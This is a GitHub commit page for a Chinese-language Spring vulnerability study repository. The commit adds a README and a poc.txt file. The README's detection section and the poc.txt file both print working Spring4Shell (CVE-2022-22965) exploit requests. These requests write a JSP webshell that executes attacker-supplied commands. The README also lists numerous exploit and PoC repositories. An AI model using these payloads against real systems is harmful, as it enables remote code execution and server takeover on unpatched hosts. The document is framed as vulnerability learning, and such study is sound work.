Skip to content

Commit ed378dc

Browse files
0e0w0e0w
committed
Update
1 parent 96c22bb commit ed378dc

23 files changed

+122
-2
lines changed

README.md

Lines changed: 97 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,2 +1,97 @@
1-
# Spring
2-
《Spring漏洞学习》
1+
# HackSpring-永恒之春
2+
3+
本项目用来致敬全宇宙最无敌Spring框架!同时也记录自己在学习Spring漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2022年3月30日,最近的一次更新时间为2022年4月1日。作者:[0e0w](https://github.com/0e0w)
4+
5+
- [01-Spring基础知识]()
6+
- [02-Spring框架识别]()
7+
- [03-Spring上层建筑]()
8+
- [04-Spring漏洞汇总]()
9+
- [05-Spring检测利用]()
10+
- [06-Spring漏洞修复]()
11+
- [07-Spring分析文章]()
12+
- [08-Spring靶场环境]()
13+
14+
## 01-Spring基础知识
15+
16+
## 02-Spring框架识别
17+
18+
- 待更新
19+
20+
## 03-Spring上层建筑
21+
22+
**Spring + ? = rce !**
23+
24+
## 04-Spring漏洞汇总
25+
26+
- CVE-2022-22965
27+
28+
## 05-Spring检测利用
29+
30+
如何判断一个网站是否存在Spring漏洞?如何查找内网中存在Sprin漏洞?
31+
32+
一、Payload
33+
34+
```
35+
POST / HTTP/1.1
36+
Host: 127.0.0.1:8090
37+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
38+
Accept-Encoding: gzip, deflate
39+
Accept: */*
40+
Connection: close
41+
suffix: %>//
42+
c1: Runtime
43+
c2: <%
44+
DNT: 1
45+
Content-Type: application/x-www-form-urlencoded
46+
Content-Length: 761
47+
48+
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
49+
```
50+
51+
二、源码检测
52+
53+
三、漏洞验证
54+
55+
- 测试时发现webshell只能写入一次!第二次失败!
56+
57+
四、漏洞扫描
58+
59+
五、其他工具
60+
61+
- https://github.com/TheGejr/SpringShell
62+
- https://github.com/BobTheShoplifter/Spring4Shell-POC
63+
- https://github.com/kh4sh3i/Spring-CVE
64+
- https://github.com/GuayoyoCyber/CVE-2022-22965
65+
- https://github.com/viniciuspereiras/CVE-2022-22965-poc
66+
- https://github.com/reznok/Spring4Shell-POC
67+
- https://github.com/jschauma/check-springshell
68+
- https://github.com/colincowie/Safer_PoC_CVE-2022-22965
69+
- https://github.com/alt3kx/CVE-2022-22965_PoC
70+
- https://github.com/exploitbin/CVE-2022-22963-Spring-Core-RCE
71+
- https://github.com/light-Life/CVE-2022-22965-GUItools
72+
- https://github.com/Mr-xn/spring-core-rce
73+
- https://github.com/Kirill89/CVE-2022-22965-PoC
74+
- https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE
75+
- https://github.com/likewhite/CVE-2022-22965
76+
- https://github.com/mebibite/springhound
77+
- https://github.com/irgoncalves/f5-waf-enforce-sig-Spring4Shell
78+
79+
## 06-Spring漏洞修复
80+
81+
## 07-Spring分析文章
82+
83+
- https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
84+
- https://bugalert.org/content/notices/2022-03-29-spring.html
85+
- https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc
86+
- https://www.springcloud.io/post/2022-03/spring-0day-vulnerability
87+
- https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
88+
89+
## 08-Spring靶场环境
90+
91+
- https://github.com/jbaines-r7/spring4shell_vulnapp
92+
- https://github.com/Kirill89/CVE-2022-22965-PoC
93+
- https://github.com/DDuarte/springshell-rce-poc
94+
- https://github.com/XuCcc/VulEnv
95+
96+
[![Stargazers over time](https://starchart.cc//HackJava/Spring.svg)](https://starchart.cc/HackJava/Spring)
97+

TEMP/Spring-beans_RCE漏洞分析.pdf

2.25 MB
Binary file not shown.

TEMP/WeChat_20220329225214.mp4

2.2 MB
Binary file not shown.

TEMP/poc.txt

Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%66%75%63%6b%7d%69
2+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
3+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.directory=%48%3a%5c%6d%79%4a%61%76%61%43%6f%64%65%5c%73%74%75%70%69%64%52%
4+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.prefix=fuckJsp
5+
http://127.0.0.1:8080/stupidRumor_war_exploded/index?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
6+
7+
8+
9+
GET /stupidRumor_war_exploded/fuckUUUU HTTP/1.1
10+
Host: 127.0.0.1:8080
11+
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36
12+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
13+
fuck: <%Runtime.getRuntime().exec(request.getParameter("cmd"))%>
14+
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
15+
Accept-Encoding: gzip, deflate
16+
Connection: close
17+
Upgrade-Insecure-Requests: 1
18+
Sec-Fetch-Dest: document
19+
Sec-Fetch-Mode: navigate
20+
Sec-Fetch-Site: none
21+
Sec-Fetch-User: ?1
22+
23+
24+
25+
stupidRumor_war_exploded/fuckJsp.jsp

TEMP/spring-rce-poc-master.zip

16.3 MB
Binary file not shown.

TEMP/微信图片_20220329223814.jpg

943 KB
Loading

TEMP/微信图片_20220329223828.jpg

81.5 KB
Loading

TEMP/微信图片_20220329223834.jpg

163 KB
Loading

TEMP/微信图片_20220329225250.jpg

58.8 KB
Loading

TEMP/微信图片_20220329225300.jpg

115 KB
Loading

0 commit comments

Comments
 (0)